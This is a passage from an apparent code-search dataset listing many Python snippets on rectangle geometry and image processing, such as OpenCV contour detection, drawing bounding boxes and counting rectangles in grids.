< min_angle) and (long_dim1 == 1 and long_dim2 == 1):\n box2 = cv2.boxPoints(rect2)\n min_angle = abs(rect[2] - rect2[2])\n\n if len(box2) != 0:\n box_pair = (box, box2)\n pairs.append(box_pair)\n\n return pairs", "def draw_rects(img, rects, color):\n for x1, y1, x2, y2 in rects:\n cv2.rectangle(img, (x1, y1), (x2, y2), color, 2)", "def rectpolyctl(xmin,xmax,ymin,ymax):\n pc=[]\n pc.append((xmin,ymin))\n pc.append((xmin,ymax))\n pc.append((xmax,ymax))\n pc.append((xmax,ymin))\n pc.append((xmin,ymin))\n return pc", "def overlap_list_rect(list_rects):\n overlap = {}\n x_points = []\n y_points = []\n\n for rect in list_rects:\n x_points.append([rect['left_x'], rect['width']])\n y_points.append([rect['bottom_y'], rect['height']])\n\n x_overlap = find_overlap_range_list(x_points)\n\n y_overlap = find_overlap_range_list(y_points)\n\n if x_overlap and y_overlap:\n overlap['left_x'] = x_overlap[0]\n overlap['bottom_y'] = y_overlap[0]\n overlap['width'] = x_overlap[1]\n overlap['height'] = y_overlap[1]\n \n return overlap", "def crop_to_regions(img: np.ndarray, check_areas: List[Dict[str, List[int]]]) -> List[np.ndarray]:\n ret = []\n for region in check_areas:\n from_x = region['start'][0]\n from_y = region['start'][1]\n to_x = from_x + region['size'][0]\n to_y = from_y + region['size'][1]\n # Don't overflow\n to_x = to_x if to_x < img.shape[1] else img.shape[1] - 1\n to_y = to_y if to_y < img.shape[0] else img.shape[0] - 1\n ret.append(img[from_y:to_y, from_x:to_x])\n return ret", "def get_rectangles_mask(self, thresh: np.ndarray) -> np.ndarray:\r\n contours = cv.findContours(thresh, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)[0]\r\n mask = np.zeros(thresh.shape, np.uint8)\r\n good_contours = sorted(\r\n [cnt for cnt in contours if 100000 < cv.contourArea(cnt) < 200000],\r\n key=cv.contourArea,\r\n )\r\n\r\n setattr(self, \"contour1\", good_contours[0])\r\n setattr(\r\n self,\r\n \"contour2\",\r\n good_contours[1]\r\n if cv.pointPolygonTest(\r\n good_contours[1], tuple(good_contours[0][0][0]), False\r\n )\r\n < 0\r\n else good_contours[2],\r\n )\r\n\r\n cv.drawContours(mask, [self.contour1], 0, 255, -1)\r\n cv.drawContours(mask, [self.contour2], 0, 255, -1)\r\n\r\n return mask", "def __init_rect_list(self, ind, min_prob = 0.5):\n #bbox_label_pred = self.net.tops['bbox_label'].data[ind]\n #binary_pred = self.net.tops['binary_label'].data[ind]\n bottom_height = self.image_height\n bottom_width = self.image_width\n bbox_label_pred = self.net.tops['bbox_pred'].data[ind]\n binary_pred = self.net.tops['binary_softmax'].data[ind]\n label_pred = self.net.tops['label_softmax'].data[ind]\n \n (_, top_height, top_width) = bbox_label_pred.shape\n y_mul = bottom_height * 1. / top_height\n x_mul = bottom_width * 1. / top_width\n rect_list = []\n for y in xrange(top_height):\n for x in xrange(top_width):\n # corresponds to indices in original image\n cx_orig = x_mul * (x + 0.5)\n cy_orig = y_mul * (y + 0.5)\n\n # we predict a symbol here if p(no label) < x\n if binary_pred[0, y, x] < 0.5:\n k = np.argmax(label_pred[:, y, x]) \n #if label_pred[k, y, x] < 0.2: continue\n\n # apply offsets to get positions in original image\n cx = cx_orig + bbox_label_pred[0, y, x]\n cy = cy_orig + bbox_label_pred[1, y, x]\n w = bbox_label_pred[2, y, x]\n h = bbox_label_pred[3, y, x]\n xmin = cx - w / 2.0\n ymin = cy - h / 2.0\n rect = Rect(xmin, ymin, xmin + w, ymin + h, label=k, prob=label_pred[k, y, x])\n rect_list.append(rect)\n\n return rect_list", "def CV_rectangles(self,XYSP):\n X,Y,S,P = XYSP\n rectangles=[]\n for i in range(3):\n for j in range(3):\n rectangles.append([(X+i*S+i*P,Y+j*S+j*P),\\\n (X+i*S+i*P+S,Y+j*S+j*P+S)])\n return rectangles", "def recursive_rectangles((x, y), (x0, y0)=(0, 0)):\n x, dx = max(x, x0), min(x, x0)\n y, dy = max(y, y0), min(y, y0)\n if (dx, dy) == (0, 0):\n return _recursive_rectangles(x, y)\n rects = _recursive_rectangles(x - dx, y - dy)\n # return set(map(lambda x: tuple(map(tuple, np.array(x) + (dx, dy))), rects))\n return set(((x1 + dx, y1 + dy), (x2 + dx, y2 + dy)) for ((x1, y1), (x2, y2)) in rects)", "def cover_rect_with_circles(w, h, r):\n\n # initialize result list\n res = []\n\n # horizontal distance between circle centers\n x_dist = math.sqrt(3) * r\n # vertical distance between circle centers\n y_dist = 1.5 * r\n # number of circles per row (different for even/odd rows)\n cnt_x_even = math.ceil(w / x_dist)\n cnt_x_odd = math.ceil((w - x_dist / 2) / x_dist) + 1\n # number of rows\n cnt_y = math.ceil((h - r) / y_dist) + 1\n\n y_offs = 0.5 * r\n for y in range(cnt_y):\n if y % 2 == 0:\n # shift even rows to the right\n x_offs = x_dist / 2\n cnt_x = cnt_x_even\n else:\n x_offs = 0\n cnt_x = cnt_x_odd\n\n for x in range(cnt_x):\n res.append((x_offs + x * x_dist, y_offs + y * y_dist))\n\n # top-right circle is not always required\n if res and not rect_circle_collision(0, w, 0, h, res[-1][0], res[-1][1], r):\n res = res[0:-1]\n\n return res", "def draw_rects(in_img, rects, colour=(255, 0, 0)):\n img = convert_when_colour(colour, in_img.copy())\n thickness = int(max(img.shape) / 150)\n for rect in rects:\n img = cv2.rectangle(\n img,\n tuple(int(x) for x in rect[0]),\n tuple(int(x) for x in rect[1]),\n colour,\n thickness,\n )\n return img", "def find_rects_white(image: np.ndarray) -> List[np.ndarray]:\n\n raise NotImplementedError()\n\n #gray = norm_color_test(image.copy())\n gray = cv.cvtColor(image.copy(), cv.COLOR_RGB2GRAY)\n gray = cv.GaussianBlur(gray, (5, 5), 0)\n #edged = cv.Canny(gray, 70, 180) # this numbers is hand picked guess from a few photos\n edged = auto_canny(gray) # this numbers is hand picked guess from a few photos\n\n # split to HSV, then pick up rouhly any white color zeroing out the rest\n hsv = cv.cvtColor(image.copy(), cv.COLOR_RGB2HSV)\n h,s,v = cv.split(hsv)\n h[h<145] = 0\n h[h>165] = 0\n #h = cv.GaussianBlur(h, (5, 5), 0)\n normed = cv.normalize(h, None, 0, 255, cv.NORM_MINMAX, cv.CV_8UC1)\n kernel = cv.getStructuringElement(shape=cv.MORPH_ELLIPSE, ksize=(5,5))\n opened = cv.morphologyEx(normed, cv.MORPH_OPEN, kernel)\n\n # now find white regions contours\n whites = cv.findContours(opened, cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE)[0]\n whites.sort(key=cv.contourArea, reverse=True)\n whites = [cnt for cnt in whites if cv.contourArea(cnt) > 15] # 15px contour area, basically cnt>=4x4\n\n whiterects = []\n for i in whites:\n rect = cv.minAreaRect(i)\n w,h = rect[1]\n if w*h > 150: # 150px area, or rougly 12x12 pixels\n whiterects.append(rect)\n\n #cv.drawContours(image, whites, -1, COLORS[2 % len(COLORS)], 2)\n #cv.imshow('test', image)\n #cv.waitKey()\n\n whites = list(map(lambda r: Rect.from_cvrect(*r[0], *r[1]), whiterects))\n\n\n\n #cv.imshow('test', edged)\n #cv.waitKey()\n\n contours = cv.findContours(edged.copy(), cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE)\n contours = contours[0] if len(contours) == 2 else contours[1]\n contours.sort(key=cv.contourArea, reverse=True)\n contours = [cnt for cnt in contours if cv.contourArea(cnt) > 15] # 15px contour area, basically cnt>=4x4\n\n rects = list(map(cv.minAreaRect, contours))\n boxes = list(map(lambda r: Rect.from_cvrect(*r[0], *r[1]), rects))\n\n # filter non overlapping contours\n for i in reversed(range(len(boxes))):\n overlaps = False\n for wbox in whites:\n if wbox.overlaps(boxes[i]):\n overlaps = True\n break\n if not overlaps:\n boxes.pop(i)\n\n boxes = Rect.nms_merge(boxes)\n\n for i in range(len(contours)):\n #peri = cv.arcLength(contours[i], True)\n #approx = cv.approxPolyDP(contours[i], 0.02 * peri, True)\n rect = cv.minAreaRect(contours[i])\n box = cv.boxPoints(rect)\n box = np.int0(box)\n #cv.drawContours(image, [box], -1, COLORS[i % len(COLORS)], 2)\n #cv.putText(image, f'{i}: {cv.contourArea(contours[i])}px', (int(rect[0][0]), int(rect[0][1])), cv.FONT_HERSHEY_SIMPLEX, 0.6, COLORS[i % len(COLORS)], 1)\n\n #cv.drawContours(image, contours, -1, COLORS[1], 2)\n\n for b in boxes:\n cv.line(image, (int(b.xmin), int(b.ymin)), (int(b.xmax), int(b.ymin)), (0, 255, 255), 2)\n cv.line(image, (int(b.xmin), int(b.ymax)), (int(b.xmax), int(b.ymax)), (0, 255, 255), 2)\n cv.line(image, (int(b.xmin), int(b.ymin)), (int(b.xmin), int(b.ymax)), (0, 255, 255), 2)\n cv.line(image, (int(b.xmax), int(b.ymin)), (int(b.xmax), int(b.ymax)), (0, 255, 255), 2)\n\n stacked = np.hstack( (cv.cvtColor(edged, cv.COLOR_GRAY2RGB), cv.cvtColor(opened, cv.COLOR_GRAY2RGB), image))\n cv.namedWindow('test', 0)\n cv.imshow('test', stacked)\n cv.waitKey()\n\n cv.imwrite('dump.jpg', stacked)\n\n\n return boxes or list()", "def _cells_for_rect(self, r):\n cells = set()\n cy = floor(r.y1 / self.cell_size)\n while (cy * self.cell_size) <= r.y2:\n cx = floor(r.x1 / self.cell_size)\n while (cx * self.cell_size) <= r.x2:\n cells.add((int(cx), int(cy)))\n cx += 1.0\n cy += 1.0\n return cells", "def draw_rects_on_img(img, rects):\n img_copy = img.copy()\n for rect in rects:\n x, y, w, h = rect\n cv2.rectangle(img_copy, (x,y), (x+w,y+h), (0,255,0), 2)\n return img_copy", "def list_square_inches(claim):\n return [(x, y)\n for x in range(claim['left'], claim['right'])\n for y in range(claim['top'], claim['bottom'])]", "def draw_rects(self, L, col):\n for (i, j) in L:\n self.draw_rect(i, j, col)", "def under_rect(self, rect):\n x_min = self.clampx((rect.left - self._origin.x) // self._cell_size[0])\n x_max = self.clampx((rect.right - self._origin.x) // self._cell_size[0])\n y_min = self.clampy((rect.top - self._origin.y) // self._cell_size[1])\n y_max = self.clampy((rect.bottom - self._origin.y) // self._cell_size[1])\n cells = []\n for ix in range(x_min, x_max + 1):\n for iy in range(y_min, y_max + 1):\n index = iy * self._cell_count[0] + ix\n cells.append(self._cells[index])\n return cells", "def get_random_rectangles(self):\n while len(self.rectangles) < self.n_rectangles:\n upper_left = [np.random.randint(0, 28) for i in range(2)] # upper-left corner coordinate\n lower_right = [np.random.randint(0, 28) for i in range(2)] # lower-right corner coordinate\n # Have upper left corner less than lower right corner of the rectangle\n if upper_left[0] < lower_right[0] and upper_left[1] < lower_right[1]:\n currentRect = Rectangle(upper_left, lower_right)\n currentArea = currentRect.area()\n # Only keep the rectangles whose area is 130 to 170\n if 130 <= currentArea <= 170:\n self.rectangles.append(currentRect)\n #print(\"Upper Left \", upper_left, \" Lower right \", lower_right, \" Area: \", currentRect.area())", "def _rectangles(m, n):\n return m * (m+1) * n * (n+1) // 4", "def get_rectangles(mask, threshold_area):\n contours, hierarchy = cv2.findContours(mask,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\n rectangles = []\n for contour in contours:\n if cv2.contourArea(contour) > threshold_area:\n rect = cv2.boundingRect(contour)\n rectangles.append(rect)\n return rectangles", "def get_rectangles(mask, threshold_area):\n contours, hierarchy = cv2.findContours(mask,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\n rectangles = []\n for contour in contours:\n if cv2.contourArea(contour) > threshold_area:\n rect = cv2.boundingRect(contour)\n rectangles.append(rect)\n return rectangles", "def cell_regions(\n x_len: float, y_len: float, factor: float = 2 / 3, buffer: float = 3.5\n) -> Tuple[List[List[float]], ...]:\n x_min, x_max = x_len / 2, -x_len / 2\n y_min, y_max = y_len / 2, -y_len / 2\n\n cell = [[x_min, x_max, x_max, x_min], [y_min, y_min, y_max, y_max]]\n\n liq = [\n [\n x_min * factor + buffer,\n x_max * factor - buffer,\n x_max * factor - buffer,\n x_min * factor + buffer,\n ],\n [\n y_min * factor + buffer,\n y_min * factor + buffer,\n y_max * factor - buffer,\n y_max * factor - buffer,\n ],\n ]\n\n crys = [\n [\n x_min * factor - buffer,\n x_max * factor + buffer,\n x_max * factor + buffer,\n x_min * factor - buffer,\n ],\n [\n y_min * factor - buffer,\n y_min * factor - buffer,\n y_max * factor + buffer,\n y_max * factor + buffer,\n ],\n ]\n\n return cell, liq, crys", "def get_boxes():\n boxes = []\n\n box_sizes = [256]\n left_x_cords = [x for x in range(0,1280,12)]\n top_y_cords = [y for y in range(360,720,12)]\n\n for box_size in box_sizes:\n for x_cord in left_x_cords:\n for y_cord in top_y_cords:\n if box_size+x_cord < 1280 and box_size+y_cord < 720:\n boxes.append([x_cord, y_cord, x_cord+box_size, y_cord+box_size])\n\n return boxes", "def build_list_of_champion_cards_rectangles(\n CARDS_TO_BUY_AMOUNT_=CARDS_TO_BUY_AMOUNT,\n Y_FIRST_CHAMPION_CARD_=Y_FIRST_CHAMPION_CARD,\n W_CHAMPION_CARD_=W_CHAMPION_CARD,\n H_CHAMPION_CARD_=H_CHAMPION_CARD,\n):\n logging.debug(\"Function build_list_of_champion_cards_rectangles() called\")\n\n cards_rectangles = [0] * CARDS_TO_BUY_AMOUNT_\n for i in range(0, CARDS_TO_BUY_AMOUNT_):\n top_left = (calculate_card_position_on_screen(i), Y_FIRST_CHAMPION_CARD_)\n bottom_right = (\n calculate_card_position_on_screen(i) + W_CHAMPION_CARD_,\n Y_FIRST_CHAMPION_CARD_ + H_CHAMPION_CARD_,\n )\n center = (\n top_left[0] + W_CHAMPION_CARD_ // 2,\n top_left[1] + H_CHAMPION_CARD_ // 2,\n )\n # print(\"Type\" ,type(center))\n cards_rectangles[i] = [top_left, bottom_right, center]\n\n logging.debug(\"Function build_list_of_champion_cards_rectangles() end\")\n return cards_rectangles", "def rectangleindices(self):\n return {r.n for r in self.rectangles}", "def _find_corners(self) -> list:\n width, height = self.width, self.height\n return [(0, 0), (width, 0), (0, height), (width, height)]", "def boundingRectPoints(cnt):\n\tx, y, w, h = cv2.boundingRect(cnt)\n\tfirst = (x, y)\n\tend = (x+w, y+h)\n\treturn {\"top-left\": first, \"bottom-right\":end}", "def to_area(x, y, w, h, bottom_only=False):\n cover = []\n if bottom_only:\n for i in range(int(ceil(w))):\n cover.append((int(x)+i, int(y+ceil(h)-1)))\n else:\n for i in range(int(ceil(w))):\n for j in range(int(ceil(h))):\n cover.append((int(x)+i, int(y)+j))\n\n return cover", "def find_rect(self, data_3d):\n datax = [i[0] for i in data_3d]\n datay = [i[1] for i in data_3d]\n\n return min(datax), max(datax), min(datay), max(datay)", "def rectangles_in_grid(x_f, y_f):\n count = 0\n for x in range(x_f):\n for y in range(y_f):\n for i in range(x, x_f):\n for j in range(y, y_f):\n count += 1\n return count", "def _build_list_of_excluded_pixels2(self, exclude_zones, img_width, img_height):\n \n full_image = numpy.ones((img_height, img_width), dtype=uint8)\n for x, y, width, height in exclude_zones:\n \n # creates a matrix where 0 is placed on pixels to exclude, and 1 on pixel to keep\n exclusion = numpy.zeros((height, width), dtype=uint8)\n exclusion = numpy.pad(exclusion, ((min(y, img_height) , max(0, img_height - (y + height))), (min(x, img_width), max(0, img_width - (x + width)))), constant_values=1)\n \n full_image *= exclusion[0:img_height, 0:img_width] # crop exclusion array if it's size is higher than image (exclusion zone outside of image dimensions)\n \n return full_image", "def get_pair_rects(contours):\n\n rect_pairs = []\n for index, cnt in enumerate(contours):\n # Rotated rect - ( center (x,y), (width, height), angle of rotation )\n rect = cv2.minAreaRect(cnt)\n center_x, center_y = rect[0]\n rect_angle = -round(rect[2], 2)\n\n if rect_angle > 45.0:\n # Iterate through all of the potential matches\n min_x_dist = min_rect = min_index = None\n for pot_index, pot_match in enumerate(contours):\n if np.array_equal(pot_match, cnt):\n continue\n\n match_rect = cv2.minAreaRect(pot_match)\n\n # Check if match is to the right of the contour\n if match_rect[0][0] > rect[0][0] and abs(\n match_rect[2] - rect_angle) > ANGLE_TOLERANCE_DEG:\n x_distance = match_rect[0][0] - rect[0][0]\n\n if min_x_dist is None or x_distance < min_x_dist:\n min_x_dist = x_distance\n min_rect = match_rect\n min_index = pot_index\n\n if min_rect is not None:\n rect_pairs.append((rect, min_rect))\n np.delete(contours, index)\n np.delete(contours, min_index)\n\n return rect_pairs", "def get_surroundings(matrix, coord):\n width = np.shape(matrix)[0]\n height = np.shape(matrix)[1]\n coordinates = []\n\n # top\n (\n coordinates.append((coord[0], coord[1] - 1))\n if coord[1] - 1 >= 0\n else None\n )\n # bottom\n (\n coordinates.append((coord[0], coord[1] + 1))\n if coord[1] + 1 < height\n else None\n )\n # left\n (\n coordinates.append((coord[0] - 1, coord[1]))\n if coord[0] - 1 >= 0\n else None\n )\n # right\n (\n coordinates.append((coord[0] + 1, coord[1]))\n if coord[0] + 1 < width\n else None\n )\n\n return coordinates", "def _recursive_encoded_rectangles(x, y):\n if x < 1 or y < 1:\n raise ValueError(\"Invalid input\")\n if x == 1 and y == 1:\n return {encode_rectangle_to_int(((1, 1), (0, 0))), } # Must return a set\n if x == 1:\n return _recursive_encoded_rectangles(x, y-1) | set(encode_rectangle_to_int(((0, j), (x, y))) for j in range(y))\n if y == 1:\n return _recursive_encoded_rectangles(x-1, y) | set(encode_rectangle_to_int(((i, 0), (x, y))) for i in range(x))\n return _recursive_encoded_rectangles(x-1, y) | _recursive_encoded_rectangles(x, y-1) | \\\n set(encode_rectangle_to_int(((i, j), (x, y))) for i in range(x) for j in range(y))", "def recursive_encoded_rectangles((x, y), (x0, y0)=(0, 0)):\n x, dx = max(x, x0), min(x, x0)\n y, dy = max(y, y0), min(y, y0)\n if (dx, dy) == (0, 0):\n return _recursive_encoded_rectangles(x, y)\n rects = _recursive_encoded_rectangles(x - dx, y - dy)\n func = partial(translate_encoded_rectangle, vector=(dx, dy))\n return set(map(func, rects))", "def get_background_pixels(img, rect):\n mask = np.zeros(img.shape[:2], np.uint8)\n bg_model = np.zeros((1,65), np.float64)\n fg_model = np.zeros((1,65), np.float64)\n cv2.grabCut(img, mask, rect, bg_model, fg_model, 5, cv2.GC_INIT_WITH_RECT)\n flattened = mask.flatten()\n background_coords = np.where((flattened == 0) | (flattened == 2))\n return background_coords", "def images_at(self, rects, colorkey = None):\n return [self.image_at(rect, colorkey) for rect in rects]", "def _get_tiles(self, width: Numeric) -> List[Polygon]:\n min_x, min_y, max_x, max_y = self._get_rounded_bounding_box(self.geom, width)\n tiles = []\n\n for i in range(0, int((max_x - min_x) / width)):\n for j in range(0, int((max_y - min_y) / width)):\n tile = box(\n (i * width) + min_x,\n (j * width) + min_y,\n ((i + 1) * width) + min_x,\n ((j + 1) * width) + min_y,\n )\n\n if self.geom.intersects(tile):\n tiles.append(tile)\n\n return tiles", "def rasterize(con, cellSize=50, xMin=None, yMin=None, xMax=None, yMax=None):\n\n if xMin is None or yMin is None or xMax is None or yMax is None:\n _xMin, _yMin, _xMax, _yMax = con.bounds\n if xMin is None:\n xMin = _xMin\n if yMin is None:\n yMin = _yMin\n if xMax is None:\n xMax = _xMax\n if yMax is None:\n yMax = _yMax\n\n hitXMax = False\n hitYMin = False\n xSlice = 0\n ySlice = 0\n halfCellSize = cellSize / 2.0\n bitmap = []\n\n while not hitYMin:\n bitmap.append([])\n yScan = -(ySlice * cellSize + halfCellSize) + yMax\n if yScan < yMin:\n hitYMin = True\n while not hitXMax:\n xScan = (xSlice * cellSize + halfCellSize) + xMin\n if xScan > xMax:\n hitXMax = True\n test = con.pointInside((xScan, yScan))\n if test:\n bitmap[-1].append(True)\n else:\n bitmap[-1].append(False)\n xSlice = xSlice + 1\n hitXMax = False\n xSlice = 0\n ySlice = ySlice + 1\n\n return bitmap", "def collision_test(rect, tiles):\r\n hit_list = []\r\n for tile in tiles:\r\n if rect.colliderect(tile):\r\n hit_list.append(tile)\r\n return hit_list", "def rectangles_in_cross_hatch(x_f, y_f):\n x0, y0 = 0, 0\n Q = np.matrix(((1, -1), (1, 1))) # Transformation matrix to cross-hatch coordinates (counter-clockwise)\n I = Q.I # Inverse transformation matrix back to grid coordinates\n y_prime_max = ((x0, y_f)*Q)[(0,1)] # Top-left of rectangle defines maximum y-value for cross-hatch coordinates\n y_prime_min = ((x_f, y0)*Q)[(0,1)] # Bottom-right defines minimum y-value\n x_prime_max = ((x_f, y_f)*Q)[(0,0)] # Top-right defines maximum x-value\n x_prime_min = 0 # Bottom-left corner remains at the origin\n x_prime_min += 1; y_prime_min += 1 # Add 1 because outer row of cross-hatch has no rectangles within the grid\n\n count = 0\n for x_prime in range(x_prime_min, x_prime_max):\n for y_prime in range(y_prime_min, y_prime_max):\n point = (x_prime, y_prime)*I\n x, y = point.A1 # .A1 flattens to allow easy assignment\n if x >= x0 and y >= y0: # Bottom corner is within bounds of grid\n for i in range(x_prime+1, x_prime_max):\n if ((i, y_prime)*I).A1[0] > x_f: break # Right corner out of grid; done with this x', y'\n for j in range(y_prime+1, y_prime_max):\n if ((x_prime, j)*I).A1[0] < x0: break # Left corner out of grid\n if ((i, j)*I).A1[1] > y_f: break # Top corner out of grid\n count += 1 # All 4 corners within bounds of grid\n return count", "def rect_union(class_list):\n if len(class_list) >= 1:\n rect_list = []\n for class_object in class_list:\n rect_list.append(class_object.rect)\n return rect_list[0].unionall(rect_list[1:])\n else:\n return Rect(0,0,0,0)", "def get_foreground_pixels(img, rect):\n mask = np.zeros(img.shape[:2], np.uint8)\n bg_model = np.zeros((1,65), np.float64)\n fg_model = np.zeros((1,65), np.float64)\n cv2.grabCut(img, mask, rect, bg_model, fg_model, 5, cv2.GC_INIT_WITH_RECT)\n flattened = mask.flatten()\n mask2 = np.where((mask == 2) | (mask == 0), 0, 1).astype('uint8')\n img = img * mask2[:,:,np.newaxis]\n # SHOW IMAGE\n # cv2.imshow(\"picture\",img)\n # cv2.waitKey(100)\n background_coords = np.where((flattened == 1) | (flattened == 3))\n # return (img , background_coords)\n ListBG = [len(background_coords[0])]\n ListBG.extend(list(background_coords[0]))\n return ListBG", "def recognize_pieces(edges, v, squares):\n\n pieces = []\n\n v = cv2.equalizeHist(v)\n for p1, p2 in squares:\n # count the number of slightly centered edges\n occupancy = sum(edges[y][x]\n for x in range(p1.x + 5, p2.x - 5)\n for y in range(p1.y + 5, p2.y - 5))\n\n if occupancy > 70*255:\n corners = (v[p1.y][p1.x], v[p1.y][p2.x],\n v[p2.y][p1.x], v[p2.y][p2.x])\n\n # average v-component of the corners\n avg = sum(map(float, corners)) / len(corners)\n\n # black pixels should be relatively black\n # when compared to the corner average\n black = sum(v[y][x] / avg < 0.2\n for x in range(p1.x, p2.x + 1)\n for y in range(p1.y, p2.y + 1))\n\n if black >= 1000 and black != 1049:\n color = \"B\"\n else:\n color = \"W\"\n\n pieces.append(color)\n else:\n pieces.append(None)\n\n return pieces", "def phantom_rectangles(n_points,R):\n \n \n #Rescaling according to image size \n R[:,0] = R[:,0]*n_points/2\n R[:,1] = R[:,1]*n_points/2\n R[:,2] = R[:,2]*n_points/2\n R[:,3] = R[:,3]*n_points/2\n R[:,4] = R[:,4]*math.pi/180\n \n x,y = np.meshgrid(np.arange(0,n_points)-n_points//2 ,np.arange(0,n_points)-n_points//2 )\n nrow,ncol = R.shape\n phantom1 = np.zeros((y.shape[0], y.shape[1], nrow))\n\n for k in range(nrow): #itero sui rettangoli\n x_new = x - R[k,0]\n y_new = y - R[k,1]\n\n u = abs(x_new*math.cos(R[k,4])+y_new*math.sin(R[k,4]))\n v = abs(-x_new*math.sin(R[k,4])+y_new*math.cos(R[k,4]))\n\n for i in range(x.shape[0]):\n for j in range(x.shape[1]):\n if (u[i,j] < R[k,2]/2 and v[i,j] < R[k,3]/2):\n phantom1[i,j,k] = R[k,5]; # gray scale\n else:\n phantom1[i,j,k] = 0.0;\n #endif\n #endfor\n #endfor\n #endfor\n\n phantom1 = phantom1.sum(axis=2)\n phantom = np.flipud(phantom1)\n return phantom", "def get_bounds(self):\r\n left, bottom, front = 10000, 10000, 10000\r\n right, top, back = -10000, -10000, -10000\r\n for b in self.buf:\r\n for v in b.vertices:\r\n if v[0] < left:\r\n left = v[0]\r\n if v[0] > right:\r\n right = v[0]\r\n if v[1] < bottom:\r\n bottom = v[1]\r\n if v[1] > top:\r\n top = v[1]\r\n if v[2] < front:\r\n front = v[2]\r\n if v[2] > back:\r\n back = v[2]\r\n\r\n return (left, bottom, front, right, top, back)", "def brute_force_rectangles_in_grid(x, y):\n s = set(imap(lambda a: hasher(*a), combinations(grid(x, y), 2)))\n s.discard(0)\n return len(s)", "def extract_walls(img_array,x_scale,y_scale,wall_height):\n\n wall_th = 2\n length = 0\n wall_list = []\n\n #check for horizontal walls first\n for row in range(img_array.shape[0]):\n for col in range(img_array.shape[1]):\n \n sec = img_array.astype(int)[row:row+2,col:col+2]\n \n if left_edge(sec):\n #check two steps to the right\n next_sec = img_array.astype(int)[row:row+2, col+1:col+3]\n next_next_sec = img_array.astype(int)[row:row+2, col+2:col+4]\n\n #if horizontal wall, get coordinates and count length\n if is_wall(next_sec) and not right_edge(next_next_sec): \n #record corner coordinates\n x = col +1\n y = row\n while is_wall(next_sec):\n #start counting length across, until right edge found\n length +=1\n col +=1\n next_sec = img_array.astype(int)[row:row+2, col:col+2]\n #create wall object and store in list \n new_wall = Wall(x*x_scale,y*y_scale,length*x_scale,wall_th*y_scale,wall_height)\n wall_list.append(new_wall)\n length = 0\n\n #check for vertical walls\n for col in range(img_array.shape[1]):\n for row in range(img_array.shape[0]):\n\n sec = img_array.astype(int)[row:row+2,col:col+2]\n \n if top_edge(sec): \n #check two steps below\n next_sec = img_array.astype(int)[row+1:row+3, col:col+2]\n next_next_sec = img_array.astype(int)[row+2:row+4, col:col+2]\n\n #if vertical wall, get coordinates and count length\n if is_wall(next_sec) and is_wall(next_next_sec):\n x = col\n y = row\n while is_wall(next_sec):\n #start counting length downwards, until bottom edge found\n length += 1\n row += 1\n next_sec = img_array.astype(int)[row:row+2, col:col+2]\n #create wall object and store in list\n new_wall = Wall(x*x_scale,y*y_scale,wall_th*x_scale,length*y_scale, wall_height)\n wall_list.append(new_wall)\n length = 0\n\n return wall_list", "def imagesAt(self, rects, colorKey = None):\n return [self.image_at(rect, colorKey) for rect in rects]", "def Recursive_Rectangles(*args):\n if len(args) == 1 and isinstance(args[0], Rectangle):\n rectangle = args[0]\n else:\n rectangle = Rectangle(*args)\n dx, dy = rectangle.vertices[0]\n if (dx, dy) == (0, 0):\n return _Recursive_Rectangles(*rectangle.vertices[1])\n\n rects = _Recursive_Rectangles(*rectangle.translated(-dx, -dy).vertices[1])\n return set(r.translated(dx, dy) for r in rects)\n # return set(((x1 + dx, y1 + dy), (x2 + dx, y2 + dy)) for ((x1, y1), (x2, y2)) in rects)", "def intersect(x):\n if len(x) < 2:\n return x\n\n # Make sure everybody have the same shape\n first_shape = tuple(x[0].shape)\n for pixmap in x[1:]:\n if first_shape != tuple(pixmap.shape):\n return []\n\n return [(np.prod(np.array(x), axis=0) > 0).astype(int)]", "def rect(rng, lines, columns):\n\n w = rng.randint(1, max(1, lines // 2))\n h = rng.randint(1, max(1, columns // 2))\n\n i = rng.randint(0, lines - h)\n j = rng.randint(0, columns - w)\n \n return i, j, w, h", "def _find_bboxes_in_rect(bboxes, left, bottom, right, top):\n result = (bboxes[:, 0] <= right) & (bboxes[:, 2] >= left) & \\\n (bboxes[:, 1] <= top) & (bboxes[:, 3] >= bottom)\n return result", "def constructRectangle(self, area: int) -> List[int]:\n w = int(area ** 0.5)\n while area % w:\n w -= 1\n\n return [area // w, w]", "def crop_image(image,list_coordinate):\n list_character = []\n lp_image = imutils.resize(image,width = 200)\n for bbox in list_coordinate:\n if bbox[0][0] == bbox[0][1] == bbox[1][0] == bbox[1][1]:\n break\n\n pts = np.array([(bbox[0][0],bbox[0][1]),\n (bbox[1][0],bbox[1][1]),\n (bbox[2][0],bbox[2][1]),\n (bbox[3][0],bbox[3][1])],dtype = \"float32\")\n \n warped = four_point_transform(lp_image,pts)\n\n # _,warped = cv2.threshold(cv2.cvtColor(warped,cv2.COLOR_BGR2GRAY),0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n # warped = cv2.resize(warped,(12,28))\n warped = resize_and_pad(warped, (28,28), padColor= 255)\n warped = warped / 255.0\n\n # warped = warped[..., None]\n list_character.append(warped)\n return list_character", "def bound_shapes(contours):\r\n\r\n contours_poly = [None]*len(contours)\r\n boundRect = [None]*len(contours)\r\n centers = [None]*len(contours)\r\n radius = [None]*len(contours)\r\n for i, c in enumerate(contours):\r\n contours_poly[i] = cv2.approxPolyDP(c, 3, True)\r\n boundRect[i] = cv2.boundingRect(contours_poly[i])\r\n centers[i], radius[i] = cv2.minEnclosingCircle(contours_poly[i])\r\n \r\n return (contours_poly, boundRect, centers, radius)", "def _crop_region(polygons, left, bottom, right, top, precision):\n cropped_polygons = []\n for p in polygons:\n clipped_polys = clipper._chop(p, [top, bottom], 1, 1 / precision)\n # polygon, [cuts], axis, scale\n for cp in clipped_polys[1]:\n result = clipper._chop(cp, [left, right], 0, 1 / precision)\n cropped_polygons += list(result[1])\n return cropped_polygons", "def _recursive_rectangles(x, y):\n if x < 1 or y < 1:\n raise ValueError(\"Invalid input\")\n if x == 1 and y == 1:\n return {((0, 0), (1, 1)), }\n if x == 1:\n return _recursive_rectangles(x, y-1) | set(((0, j), (x, y)) for j in range(y))\n if y == 1:\n return _recursive_rectangles(x-1, y) | set(((i, 0), (x, y)) for i in range(x))\n return _recursive_rectangles(x-1, y) | _recursive_rectangles(x, y-1) | \\\n set(((i, j), (x, y)) for i in range(x) for j in range(y))", "def 